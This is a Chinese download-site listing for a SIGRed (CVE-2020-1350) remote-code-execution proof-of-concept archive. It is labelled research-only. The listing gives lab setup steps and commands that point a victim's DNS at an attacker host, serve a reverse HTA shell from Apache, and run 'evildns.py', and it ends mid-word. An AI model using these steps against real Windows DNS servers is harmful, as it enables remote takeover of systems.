1. 首页
  2. 数据库
  3. 其它
  4. SIGRed_RCE_PoC 源码

SIGRed_RCE_PoC 源码

上传者: 2021-04-24 17:02:00上传 ZIP文件 283KB 热度 6次
适用于CVE-2020-1350,SigRed的PoC远程代码执行漏洞利用。 创建人: 仅用于研究目的。 使用风险自负。 利用写作 有关使用的方法的详细信息在这里: 实验室环境设置 攻击者将建立一个邪恶域,其NS记录指向恶意服务器(攻击者计算机)。 出于演示/测试目的,只需在受害者计算机上设置条件转发器即可将“恶意域”请求转发到攻击者计算机。 工具-> DNS 在Linux攻击者机器上:(我使用了基本的Ubuntu 20.04.1 VM) sudo python3 configure.py -ip IP_ATTACKER -p PORT_REVERSE_SHELL -hp PORT_APACHE_SERVER (default 80) 这会将受害者配置为下载反向HTA Shell的Apache服务器。 运行漏洞利用 sudo python3 evildns.py 需要su
用户评论